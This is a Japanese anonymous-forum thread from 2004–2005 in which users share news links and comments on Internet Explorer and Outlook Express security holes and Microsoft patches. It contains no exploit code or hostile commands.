というのが、「アプリケーションの追加と削除」にリストアップされています。
これは、システム情報の W98.SE の所でも見られます。
ちなみに、IE5→5.5→6とバージョンアップしてきて、IEをアンインストールしたことはありません。
>>829
有り難う御座います!参考になりました。
そうか、システム情報か・・・
> バージョン 6.0.2800.1106IS
このISってのが謎です。
↓うちのはこんな感じです。
バージョン6.0.2800.1106
ビルド62800.1106
アプリケーションのパスC:\Program Files\Internet Explorer
最終インストールの日付04/12/08 13:32:51
言語日本語
暗号強度128 ビット
コンテンツ アドバイザ無効
更新バージョン;SP1;Q889293;Q837009;q313829;
Java VM バージョン5.0.3810.0
IEAK インストールしない
有り難う御座います!参考になりました。
そうか、システム情報か・・・
> バージョン 6.0.2800.1106IS
このISってのが謎です。
↓うちのはこんな感じです。
バージョン6.0.2800.1106
ビルド62800.1106
アプリケーションのパスC:\Program Files\Internet Explorer
最終インストールの日付04/12/08 13:32:51
言語日本語
暗号強度128 ビット
コンテンツ アドバイザ無効
更新バージョン;SP1;Q889293;Q837009;q313829;
Java VM バージョン5.0.3810.0
IEAK インストールしない
831 :名無しさん@お腹いっぱい。:04/12/09 10:41:14
IEやFirefoxなどにポップアップ・ウインドウを“乗っ取られる”セキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041208/153638/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041208/153638/
832 :名無しさん@お腹いっぱい。:04/12/09 20:30:09
>>831
そこの
>Secuniaでは「信頼できるサイトを閲覧しているときには,信頼できないサイトを閲覧しない
>(Do not browse untrusted sites while browsing trusted sites)」ことを対策として挙げている。
の意味がいまいち分からんけど、やっぱ漏れが頭が悪いからかな?
そこの
>Secuniaでは「信頼できるサイトを閲覧しているときには,信頼できないサイトを閲覧しない
>(Do not browse untrusted sites while browsing trusted sites)」ことを対策として挙げている。
の意味がいまいち分からんけど、やっぱ漏れが頭が悪いからかな?
833 :名無しさん@お腹いっぱい。:04/12/10 00:56:09
>>832
作成者が分かってるサイトと一緒に、誰が作ってるのか分からないような変なサイト見るなって事。
作成者が分かってるサイトと一緒に、誰が作ってるのか分からないような変なサイト見るなって事。
834 :名無しさん@お腹いっぱい。:04/12/11 23:19:00
「IEでしか読めないページ,Windowsでしか使えないシステムは不適」,経産省が調達ガイドライン作成へ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041210/153722/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041210/153722/
835 :KB887797:04/12/15 12:24:01
Outlook Express 6 Sevice Pack 1 の累積的な更新プログラム(KB887797)
なるものがWindowsUpdateに来ている。詳細不明。
なるものがWindowsUpdateに来ている。詳細不明。
× Sevice Pack 1
○ Service Pack 1
逝ってきます…
○ Service Pack 1
逝ってきます…
>>836
ああ、835だった。834氏スマソ本当に逝ってきます。
ああ、835だった。834氏スマソ本当に逝ってきます。
838 :名無しさん@お腹いっぱい。:04/12/15 15:31:44
KB887797は、Knowledge Baseもまだ用意されてないね。
しばらく様子見。
http://www.microsoft.com/downloads/results.aspx?productID=&freetext=KB887797&DisplayLang=en
Knowledge Base Article
http://go.microsoft.com/fwlink/?LinkId=38306 (これから用意するつもりらしい)
しばらく様子見。
http://www.microsoft.com/downloads/results.aspx?productID=&freetext=KB887797&DisplayLang=en
Knowledge Base Article
http://go.microsoft.com/fwlink/?LinkId=38306 (これから用意するつもりらしい)
839 :名無しさん@お腹いっぱい。:04/12/15 18:57:13
>>838
http://www.microsoft.com/downloads/details.aspx?FamilyID=785c35bb-0f03-4f2d-9e1c-66c9934b4610&DisplayLang=en
>Supported Operating Systems: Windows XP Service Pack 2
「まさかSP2でエンバグ゙しちゃったわけないよね?なにしろ名前にセキュリティ強化機能搭載ってつけたぐらいだし。」
嫌味ったらしく小1時間(ryしたい>MS
http://www.microsoft.com/downloads/details.aspx?FamilyID=785c35bb-0f03-4f2d-9e1c-66c9934b4610&DisplayLang=en
>Supported Operating Systems: Windows XP Service Pack 2
「まさかSP2でエンバグ゙しちゃったわけないよね?なにしろ名前にセキュリティ強化機能搭載ってつけたぐらいだし。」
嫌味ったらしく小1時間(ryしたい>MS
840 :名無しさん@お腹いっぱい。:04/12/15 21:19:29
Outlook Express 6 Service Pack 1 用の累積的な更新プログラム (KB887797)
このセキュリティに関連しない更新プログラムによって、Outlook Express のさまざまな問題が解決されます。
デスクトップに ~ というファイルが作成されるのが無くなったかも。
このセキュリティに関連しない更新プログラムによって、Outlook Express のさまざまな問題が解決されます。
デスクトップに ~ というファイルが作成されるのが無くなったかも。
841 :名無しさん@お腹いっぱい。:04/12/16 09:21:45
KB887797ぐぐっても昨日は0件だったが、今日は684件になってる(・∀・)
でも、めぼしい情報はなさげ(;´Д`)
でも、めぼしい情報はなさげ(;´Д`)
842 :名無しさん@お腹いっぱい。:04/12/16 17:16:17
>>841
http://www.microsoft.com/downloads/results.aspx?freetext=887797&productID=&DisplayEnglishAlso=on&DisplayLang=ja
OE SP2は「Windows XP 用 Outlook Express」と言い張ることになったらしいw
てことはIE SP2も日本語情報では「Windows XP 用 Internet Explorer」になるのかな
ある意味正しいしわかりやすくて(・∀・)イイ!!けど
887797は↓の修正パッチがWindowsUpdateにも北ということでいい?>ALL
http://support.microsoft.com/default.aspx?scid=kb;ja;843555
oO(なんで今?)
http://www.microsoft.com/downloads/results.aspx?freetext=887797&productID=&DisplayEnglishAlso=on&DisplayLang=ja
OE SP2は「Windows XP 用 Outlook Express」と言い張ることになったらしいw
てことはIE SP2も日本語情報では「Windows XP 用 Internet Explorer」になるのかな
ある意味正しいしわかりやすくて(・∀・)イイ!!けど
887797は↓の修正パッチがWindowsUpdateにも北ということでいい?>ALL
http://support.microsoft.com/default.aspx?scid=kb;ja;843555
oO(なんで今?)
843 :名無しさん@お腹いっぱい。:04/12/17 08:47:05
>>842
そだね。http://support.microsoft.com/default.aspx?scid=kb;ja;843555の修正だね。
やっとhttp://support.microsoft.com/kb/887797が公開された。
KB887797適用上の注意点は、
>ノート この最新版がウインドウズ・アッデート・ウェブサイト上であなたに利用可能になる前に、
>次のマイクロソフト知識基礎記事に記述される最新版をインストールしなければなりません。
>823353 MS04-018:アウトルック・エキスプレスのための累積的なセキュリティ最新版
>http://support.microsoft.com/kb/823353
そだね。http://support.microsoft.com/default.aspx?scid=kb;ja;843555の修正だね。
やっとhttp://support.microsoft.com/kb/887797が公開された。
KB887797適用上の注意点は、
>ノート この最新版がウインドウズ・アッデート・ウェブサイト上であなたに利用可能になる前に、
>次のマイクロソフト知識基礎記事に記述される最新版をインストールしなければなりません。
>823353 MS04-018:アウトルック・エキスプレスのための累積的なセキュリティ最新版
>http://support.microsoft.com/kb/823353
844 :名無しさん@お腹いっぱい。:04/12/17 11:31:26
>>842-843
Outlook Expressに「BCC」を表示する新たな不具合,MSはパッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041216/153984/
>米Microsoftは米国時間12月16日,同社のメール・ソフト「Outlook Express」に
>見つかった不具合を公表した。メールの送信者が「BCC(Blind Carbon Copy)」
>欄に記入したアドレスを,受信者すべてに見られる可能性がある。同様の不具合は
>2004年8月に見つかっているhttp://support.microsoft.com/kb/843555が,
>今回公表されたのは別の不具合である(関連記事http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/)。
>同社では,この不具合を修正するための更新プログラム(パッチ)を公開した。
>同パッチを適用すれば,2004年8月の不具合を含む,いくつかの不具合も修正できる。
Outlook Expressに「BCC」を表示する新たな不具合,MSはパッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041216/153984/
>米Microsoftは米国時間12月16日,同社のメール・ソフト「Outlook Express」に
>見つかった不具合を公表した。メールの送信者が「BCC(Blind Carbon Copy)」
>欄に記入したアドレスを,受信者すべてに見られる可能性がある。同様の不具合は
>2004年8月に見つかっているhttp://support.microsoft.com/kb/843555が,
>今回公表されたのは別の不具合である(関連記事http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/)。
>同社では,この不具合を修正するための更新プログラム(パッチ)を公開した。
>同パッチを適用すれば,2004年8月の不具合を含む,いくつかの不具合も修正できる。
845 :名無しさん@お腹いっぱい。:04/12/18 15:16:42
846 :名無しさん@お腹いっぱい。:04/12/19 22:54:20
IEにクロスサイト・スクリプティング攻撃を許すぜい弱性,ページ偽装やCookie盗難の危険
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041217/154040/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041217/154040/
847 :名無しさん@お腹いっぱい。:04/12/20 02:21:23
>844
分割送信時のみの危険ということだな。分割送信のチェックだけまずは
チェックオフを確認して、IEのSP待つとしよう。
分割送信時のみの危険ということだな。分割送信のチェックだけまずは
チェックオフを確認して、IEのSP待つとしよう。
848 :名無しさん@お腹いっぱい。:04/12/20 23:26:32
>>847
残念
>今回の不具合は,メールを分割しなくてもBCCのアドレスを本文中に表示してしまうというもの。
しかしSP2になっても相変わらずグダグダだw
>>846&http://pc5.2ch.net/test/read.cgi/sec/1060956936/754
残念
>今回の不具合は,メールを分割しなくてもBCCのアドレスを本文中に表示してしまうというもの。
しかしSP2になっても相変わらずグダグダだw
>>846&http://pc5.2ch.net/test/read.cgi/sec/1060956936/754
849 :名無しさん@お腹いっぱい。:04/12/21 01:00:19
>848
ああ読み違えた。ありがと。当てました。
ああ読み違えた。ありがと。当てました。
850 :名無しさん@お腹いっぱい。:04/12/21 12:28:05
不具合をこっそりと直して知らん振りを決め込むのは、企業として何処でもやっている当たり前の行為だ。
大企業としてまず率先して情報公開に貢献してもらいたいものだ。
大企業としてまず率先して情報公開に貢献してもらいたいものだ。
851 :名無しさん@お腹いっぱい。:04/12/21 21:26:19
Microsoftはかなり貢献してると思うけど。マジで
852 :名無しさん@お腹いっぱい。:04/12/22 16:23:19
IEにフィッシングの危険――ActiveXに問題
Microsoftは、複数のセキュリティ関連企業から指摘された、
Internet Explorer 6の脆弱性について、調査を進めていると明らかにした。
http://www.itmedia.co.jp/enterprise/articles/0412/20/news009.html
(´-`).。oO(信頼できるサイトを除いて、Internet Explorerで閲覧しないことだね…)
Microsoftは、複数のセキュリティ関連企業から指摘された、
Internet Explorer 6の脆弱性について、調査を進めていると明らかにした。
http://www.itmedia.co.jp/enterprise/articles/0412/20/news009.html
(´-`).。oO(信頼できるサイトを除いて、Internet Explorerで閲覧しないことだね…)
853 :名無しさん@お腹いっぱい。:04/12/24 16:52:40
[Full-Disclosure] Internet Explorer FTP client can be used to send mail
http://lists.netsys.com/pipermail/full-disclosure/2004-December/030229.html
http://lists.netsys.com/pipermail/full-disclosure/2004-December/030229.html
854 :名無しさん@お腹いっぱい。:04/12/24 23:36:10
安全という嘘をつくにはさらに嘘をつかねばならない。
独占企業と訴えられないようにAppleを生かしておかねばならない。
独占企業と訴えられないようにAppleを生かしておかねばならない。
855 :名無しさん@お腹いっぱい。:04/12/27 12:41:21
Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise
http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm
http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm
856 :名無しさん@お腹いっぱい。:04/12/28 12:01:30
俺自身の脆弱性が問題だ
857 :名無しさん@お腹いっぱい。:04/12/28 12:13:59
>>856
何でもクリックしてしまう悲しい性とか?
何でもクリックしてしまう悲しい性とか?
858 :名無しさん@お腹いっぱい。:04/12/28 12:32:19
正解。
859 :名無しさん@お腹いっぱい。:04/12/28 13:25:33
┐(´ー`)┌
860 :名無しさん@お腹いっぱい。:05/01/05 17:08:28
IEのFTP機能にセキュリティ・ホール,任意のファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050105/154424/
http://secunia.com/advisories/13704/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050105/154424/
http://secunia.com/advisories/13704/
861 :名無しさん@お腹いっぱい。:05/01/05 23:12:16
862 :名無しさん@お腹いっぱい。:05/01/12 12:21:53
HTML ヘルプの脆弱性により、コードが実行される (890175) (MS05-001)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-001.asp
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-002.asp
インデックス サービスの脆弱性により、コードが実行される (871250) (MS05-003)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp
Windowsの修正パッチが3件公開,既知の危険なセキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050112/154606/
1月のWindowsアップデート、HTMLヘルプの脆弱性などに対処
http://www.itmedia.co.jp/enterprise/articles/0501/12/news007.html
マイクロソフト、「緊急」レベルのWindowsパッチをリリースへ
http://japan.cnet.com/news/sec/story/0,2000050480,20079963,00.htm
------------------------------------------------------------------
IE 6の脆弱性、最高レベルの深刻度に--セキュリティ対策企業が評価引き上げ
http://japan.cnet.com/news/sec/story/0,2000050480,20079962,00.htm
http://www.microsoft.com/japan/technet/security/bulletin/ms05-001.asp
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-002.asp
インデックス サービスの脆弱性により、コードが実行される (871250) (MS05-003)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp
Windowsの修正パッチが3件公開,既知の危険なセキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050112/154606/
1月のWindowsアップデート、HTMLヘルプの脆弱性などに対処
http://www.itmedia.co.jp/enterprise/articles/0501/12/news007.html
マイクロソフト、「緊急」レベルのWindowsパッチをリリースへ
http://japan.cnet.com/news/sec/story/0,2000050480,20079963,00.htm
------------------------------------------------------------------
IE 6の脆弱性、最高レベルの深刻度に--セキュリティ対策企業が評価引き上げ
http://japan.cnet.com/news/sec/story/0,2000050480,20079962,00.htm
863 :名無しさん@お腹いっぱい。:05/01/12 14:49:59
IEのパッチ未公開セキュリティ・ホールを再警告,デモ・ページも公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050111/154582/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050111/154582/
864 :名無しさん@お腹いっぱい。:05/01/17 16:16:46
まさかセキュリティ情報一覧をセキュリティ情報検索(自動ですべて)と合体しちゃうとは思わなかったー
一覧画面から情報の最終更新日わかんないyo
初めて出た日付なんてどうでもいいんじゃ いっつも後から大事な情報出してくるじゃん ヴォケ−
そんなに釣った魚にリソース割り当てたくないのかよ(´・ω・`)ショボーン
一覧画面から情報の最終更新日わかんないyo
初めて出た日付なんてどうでもいいんじゃ いっつも後から大事な情報出してくるじゃん ヴォケ−
そんなに釣った魚にリソース割り当てたくないのかよ(´・ω・`)ショボーン
865 :名無しさん@お腹いっぱい。:05/01/18 08:54:02
>>861 XP SP2もだめぽ。
XP SP2のIEにセキュリティ・ホール,警告なしにファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050117/154841/
>>864
なんか使いにくくなったね。
XP SP2のIEにセキュリティ・ホール,警告なしにファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050117/154841/
>>864
なんか使いにくくなったね。
866 :名無しさん@お腹いっぱい。:05/01/18 10:04:22
867 :名無しさん@お腹いっぱい。:05/01/18 15:08:07
868 :名無しさん@お腹いっぱい。:05/01/18 21:43:41
[WSJ] MSの無料スパイウェア対策ソフトを推奨できない理由
http://www.itmedia.co.jp/enterprise/articles/0501/17/news085.html
http://www.itmedia.co.jp/enterprise/articles/0501/17/news085.html
869 :名無しさん@お腹いっぱい。:05/01/20 15:17:45
MSセキュリティ ホーム から
tp://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp
MSセキュリティ情報検索(元一覧ページ) から
tp://www.microsoft.com/japan/technet/security/Bulletin/MS05-003.asp
(05-003はただの例)
同じところなのに大文字と小文字違いで一度飛んだリンクも紫にさせない意味わけわかめ
意味なんてないのかも???
tp://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp
MSセキュリティ情報検索(元一覧ページ) から
tp://www.microsoft.com/japan/technet/security/Bulletin/MS05-003.asp
(05-003はただの例)
同じところなのに大文字と小文字違いで一度飛んだリンクも紫にさせない意味わけわかめ
意味なんてないのかも???
870 :名無しさん@お腹いっぱい。:05/01/21 04:00:45
メーラーはOutlook以外を使う
ブラウザはIE以外を使う
これだけでセキュリティレベルが上がる
ブラウザはIE以外を使う
これだけでセキュリティレベルが上がる
871 :名無しさん@お腹いっぱい。:05/01/25 14:11:11
Windowsのセキュリティ問題、最新パッチでは修正されず
http://japan.cnet.com/news/sec/story/0,2000050480,20080243,00.htm
http://japan.cnet.com/news/sec/story/0,2000050480,20080243,00.htm
872 :名無しさん@お腹いっぱい。:05/01/28 17:18:26
http://pc.watch.impress.co.jp/docs/2005/0128/ms.htm
クライアント部門は営業利益率78%・・・ピークよりはsageてるね
クライアント部門は営業利益率78%・・・ピークよりはsageてるね
873 :名無しさん@お腹いっぱい。:05/01/28 21:47:57
Outlook Express で ASCII 文字以外の文字を使用すると本文が切れてしまう
http://support.microsoft.com/default.aspx?scid=kb;ja;893197
概要:Outlook Express 6 Service Pack 2 において ASCII 文字以外の文字を使用してメールを作成し、
送信トレイに一度保存した後、 再度送信トレイを開くと、作成したメールが途中から切れて削除されて
しまう場合があります。
解決方法:この問題を解決するには、Windows Update Web サイトから
[KB:887797 Windows 用 Outlook Express の更新プログラム] の更新プログラムを入手します。
http://windowsupdate.microsoft.com/
http://support.microsoft.com/default.aspx?scid=kb;ja;893197
概要:Outlook Express 6 Service Pack 2 において ASCII 文字以外の文字を使用してメールを作成し、
送信トレイに一度保存した後、 再度送信トレイを開くと、作成したメールが途中から切れて削除されて
しまう場合があります。
解決方法:この問題を解決するには、Windows Update Web サイトから
[KB:887797 Windows 用 Outlook Express の更新プログラム] の更新プログラムを入手します。
http://windowsupdate.microsoft.com/
874 :名無しさん@お腹いっぱい。:05/02/04 17:04:26
2月のマイクロソフト月例セキュリティ修正は13件も,「緊急」が非常に多い
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050204/2/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050204/2/
875 :名無しさん@お腹いっぱい。:05/02/08 15:32:05
>>874
いよいよ明日ですね
いよいよ明日ですね
876 :名無しさん@お腹いっぱい。:05/02/09 10:39:26
Internet Explorer 用の累積的なセキュリティ更新プログラム (867282) (MS05-014)
公開日: 2005年2月9日 | 最終更新日: 2005年2月9日
http://www.microsoft.com/japan/technet/security/bulletin/ms05-014.mspx
公開日: 2005年2月9日 | 最終更新日: 2005年2月9日
http://www.microsoft.com/japan/technet/security/bulletin/ms05-014.mspx
877 :名無しさん@お腹いっぱい。:05/02/09 18:11:07
>>876
>重要: 以前に適用した修正プログラムまたは、更新プログラムのロールアップを使用している環境には、本セキュリティ更新プログラムを適用してはいけません。
>「よく寄せられる質問」をご覧いただき、適切な更新プログラムのロールアップを適用してください。
「いけません」ってめちゃx2誤解させる書き方だよな
これって結局
「電話で修正プログラム手に入れてもない&IEロールアップあてたことない香具師にはどーでもいー話だけど
関係ある環境は11月以降のIEロールアップあたってるならこのパッチだけで面倒見てやるけど
あたってない環境だとインストーラ的にアウトなんで11月(か12月)IEロールアップあててからこのパッチもあてれ」
だよね?
だったらパッチ・インストーラ作り直そうyoって思ったの漏れだけ?
ふー 大漁パッチあてやっとオワタ
フレーフレー(としかいいようがないけど)>いろんな動作(ryしなきゃ/もう始めてるよの中の人
>重要: 以前に適用した修正プログラムまたは、更新プログラムのロールアップを使用している環境には、本セキュリティ更新プログラムを適用してはいけません。
>「よく寄せられる質問」をご覧いただき、適切な更新プログラムのロールアップを適用してください。
「いけません」ってめちゃx2誤解させる書き方だよな
これって結局
「電話で修正プログラム手に入れてもない&IEロールアップあてたことない香具師にはどーでもいー話だけど
関係ある環境は11月以降のIEロールアップあたってるならこのパッチだけで面倒見てやるけど
あたってない環境だとインストーラ的にアウトなんで11月(か12月)IEロールアップあててからこのパッチもあてれ」
だよね?
だったらパッチ・インストーラ作り直そうyoって思ったの漏れだけ?
ふー 大漁パッチあてやっとオワタ
フレーフレー(としかいいようがないけど)>いろんな動作(ryしなきゃ/もう始めてるよの中の人
878 :名無しさん@お腹いっぱい。:05/02/10 08:11:04
Windowsなどに危険なセキュリティ・ホールが多数,早急にパッチの適用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050209/155909/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050209/155909/
879 :名無しさん@お腹いっぱい。:05/02/10 17:34:49
http://www.itmedia.co.jp/enterprise/articles/0502/09/news080.html
>OSのメンテナンスにリソースを割くことではないはずです。
・・・この言葉だけは正し杉・・・言う相手はともかく
>OSのメンテナンスにリソースを割くことではないはずです。
・・・この言葉だけは正し杉・・・言う相手はともかく
880 :名無しさん@お腹いっぱい。:05/02/14 12:38:23
>>877
IE のアップデート MS05-014 (KB867282) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000296.html
IE のアップデート MS05-014 (KB867282) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000296.html
881 :名無しさん@お腹いっぱい。:05/02/16 12:18:17
米Microsoftがセキュリティ強化ロードマップ,IE 7.0のベータをXP SP2向けに今夏リリース
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20050216/156231/
いじわるしないで他のOS向けにも出すべきだよ。
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20050216/156231/
いじわるしないで他のOS向けにも出すべきだよ。
882 :881のリンクから飛んだんだけど:05/02/16 19:06:09
IE 7だけではない、MSのセキュリティ強化策
http://www.itmedia.co.jp/news/articles/0502/16/news044.html
>従来ほど大きなファイルをダウンロードしなくて済む、新しいパッチの配信を急いでいる
大きいって感じないんだけどなー
集中が問題とかか?
http://www.itmedia.co.jp/news/articles/0502/16/news044.html
>従来ほど大きなファイルをダウンロードしなくて済む、新しいパッチの配信を急いでいる
大きいって感じないんだけどなー
集中が問題とかか?
881のリンクじゃないや
884 :名無しさん@お腹いっぱい。:05/02/17 16:11:30
[Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing
http://lists.netsys.com/pipermail/full-disclosure/2005-February/031773.html
http://lists.netsys.com/pipermail/full-disclosure/2005-February/031773.html
885 :名無しさん@お腹いっぱい。:05/02/22 15:20:39
XP SP2のIE 6にタイトルバーを偽装される脆弱性、フィッシング詐欺も懸念
http://internet.watch.impress.co.jp/cda/news/2005/02/22/6538.html
http://internet.watch.impress.co.jp/cda/news/2005/02/22/6538.html
886 :名無しさん@お腹いっぱい。:05/02/23 08:52:39
Windows Update キタ─wwヘ√レvv~(゚∀゚)─wwヘ√レvv~─!!!!!!
Double-byte character set (DBCS) characters may appear corrupted in
Internet Explorer on Windows XP when you browse a Web site that uses
Shift-JIS character encoding(KB886677)
http://support.microsoft.com/kb/886677
You receive the Stop error "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)"
in Windows XP Service Pack 2 or Windows Server 2003(KB887742)
http://support.microsoft.com/kb/887742
Double-byte character set (DBCS) characters may appear corrupted in
Internet Explorer on Windows XP when you browse a Web site that uses
Shift-JIS character encoding(KB886677)
http://support.microsoft.com/kb/886677
You receive the Stop error "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)"
in Windows XP Service Pack 2 or Windows Server 2003(KB887742)
http://support.microsoft.com/kb/887742
887 :名無しさん@お腹いっぱい。:05/02/23 16:54:18
>>886
マイクロソフト,XP SP2用の重要なパッチをWindows Updateで公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050223/156582/
>パッチ自体は2004年中に同社のWebサイトで公開されていたが,今回Windows Updateでも公開された。
>重要なパッチなので,XP SP2用ユーザーは適用しておきたい。
マイクロソフト,XP SP2用の重要なパッチをWindows Updateで公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050223/156582/
>パッチ自体は2004年中に同社のWebサイトで公開されていたが,今回Windows Updateでも公開された。
>重要なパッチなので,XP SP2用ユーザーは適用しておきたい。
888 :名無しさん@お腹いっぱい。:05/02/23 20:18:33
MS、XP SP2向け2種類の更新プログラムをWindows Update経由で公開
http://www.itmedia.co.jp/enterprise/articles/0502/23/news085.html
http://www.itmedia.co.jp/enterprise/articles/0502/23/news085.html
889 :名無しさん@お腹いっぱい。:05/02/23 20:24:20
たまたまとられた
890 :名無しさん@お腹いっぱい。:05/02/24 15:25:32
Blogがやばい――スパイウェアの配布に悪用される脆弱性あり
http://www.itmedia.co.jp/news/articles/0502/24/news045.html
>セキュリティ専門家らによると、この問題が影響するのは、
>MicrosoftのInternet Explorer(IE)ユーザーがセキュリティ設定を最高にしていない場合だけだという。
http://www.itmedia.co.jp/news/articles/0502/24/news045.html
>セキュリティ専門家らによると、この問題が影響するのは、
>MicrosoftのInternet Explorer(IE)ユーザーがセキュリティ設定を最高にしていない場合だけだという。
891 :名無しさん@お腹いっぱい。:05/02/24 20:34:22
>>886-888の日本語?
Windows XP 上の Internet Explorer で Shift-JIS 文字エンコードを使用する Web サイトを参照すると、2 バイト文字セット (DBCS) 文字が正しく表示されない場合がある
http://support.microsoft.com/kb/886677/ja
Windows XP Service Pack 2 または Windows Server 2003 で Stop エラー "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)" が表示される
http://support.microsoft.com/kb/887742/ja
Windows XP 上の Internet Explorer で Shift-JIS 文字エンコードを使用する Web サイトを参照すると、2 バイト文字セット (DBCS) 文字が正しく表示されない場合がある
http://support.microsoft.com/kb/886677/ja
Windows XP Service Pack 2 または Windows Server 2003 で Stop エラー "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)" が表示される
http://support.microsoft.com/kb/887742/ja
892 :名無しさん@お腹いっぱい。:05/02/25 02:18:32
893 :名無しさん@お腹いっぱい。:05/02/25 13:20:31
IEにこんな裏技あるのね。ちょっとスレ違いだけど・・・
>常駐させなくても(・∀・)イイ!! SpywareBlaster 5
>>>718
>そんなにスパイウェアが心配ならこの辺も熟読しておこう。
>
>【総合】スパイウェア予防駆除 Part6
>http://pc5.2ch.net/test/read.cgi/sec/1108613740/19-53
>
>IEのステータスバーをWクリック→インターネットゾーンを「高」
>
>見慣れないサイトを見る時にこうする癖をつければ、まず感染することはない。
>常駐させなくても(・∀・)イイ!! SpywareBlaster 5
>>>718
>そんなにスパイウェアが心配ならこの辺も熟読しておこう。
>
>【総合】スパイウェア予防駆除 Part6
>http://pc5.2ch.net/test/read.cgi/sec/1108613740/19-53
>
>IEのステータスバーをWクリック→インターネットゾーンを「高」
>
>見慣れないサイトを見る時にこうする癖をつければ、まず感染することはない。
894 :名無しさん@お腹いっぱい。:05/02/25 15:34:16
>>892
そんな手口いきなり詳しく書いちゃかえってまずいじゃん
そんな手口いきなり詳しく書いちゃかえってまずいじゃん
895 :名無しさん@お腹いっぱい。:05/02/25 16:57:39
896 :名無しさん@お腹いっぱい。:05/02/28 11:00:38
IE 7.0はタブ付きブラウジング機能を搭載
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050228/3/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050228/3/
897 :名無しさん@お腹いっぱい。:05/03/01 08:14:43
タイピングの速さに自信がある諸君
ここの250点という怪記録を越えることができるかな
ttp://freegame.sytes.net/~take/cgi-bin/typecreate/index.html
ここの250点という怪記録を越えることができるかな
ttp://freegame.sytes.net/~take/cgi-bin/typecreate/index.html
898 :名無しさん@お腹いっぱい。:05/03/01 13:17:53
>>897
ブラクラサイト
ブラクラサイト
899 :名無しさん@お腹いっぱい。:05/03/07 10:41:06
IE 7.0はWindows 2003 SP1とXP x64向けにも開発,Outlook Expressの新版はなし
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050307/2/
Windows 2000 SP4向けにも頼むYO orz
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050307/2/
Windows 2000 SP4向けにも頼むYO orz
900 :名無しさん@お腹いっぱい。:05/03/07 15:15:07
なければないでちょっと不安になってくるのは気のせいかw
> 2005 年 3 月 8 日 (米国日付)、マイクロソフト セキュリティ レスポンス センターは、新しいセキュリティ情報をリリースする予定はありません。
http://www.microsoft.com/japan/technet/security/bulletin/advance.mspx
> 2005 年 3 月 8 日 (米国日付)、マイクロソフト セキュリティ レスポンス センターは、新しいセキュリティ情報をリリースする予定はありません。
http://www.microsoft.com/japan/technet/security/bulletin/advance.mspx
901 :名無しさん@お腹いっぱい。:05/03/15 08:34:38
フリー・ソフトでIEを強化しよう
http://itpro.nikkeibp.co.jp/free/NT/WinColumn/20050314/1/
http://itpro.nikkeibp.co.jp/free/NT/WinColumn/20050314/1/
902 :名無しさん@お腹いっぱい。:2005/03/24(木) 15:57:14
セキュリティで保護された Web サイトに接続すると Internet Explorer 6 SP1 が応答を停止することがある
http://support.microsoft.com/default.aspx?scid=kb;ja;842607
http://support.microsoft.com/default.aspx?scid=kb;ja;842607
903 :名無しさん@お腹いっぱい。:2005/03/24(木) 15:59:23
リンクをクリックすると文字のサイズが中に戻る
http://support.microsoft.com/default.aspx?scid=kb;ja;896315
http://support.microsoft.com/default.aspx?scid=kb;ja;896315
904 :名無しさん@お腹いっぱい。:2005/03/24(木) 22:01:53
905 :名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 14:18:55
マイクロソフト:「Windows用パッチに脆弱性あり」
http://japan.cnet.com/news/sec/story/0,2000050480,20082248,00.htm
>Microsoftは、1月にリリースしたWindows 98/ME用のセキュリティパッチに欠陥があり、
>これらのオペレーティングシステム(OS)が動作するシステムが攻撃を受けるおそれがあることを認めた。
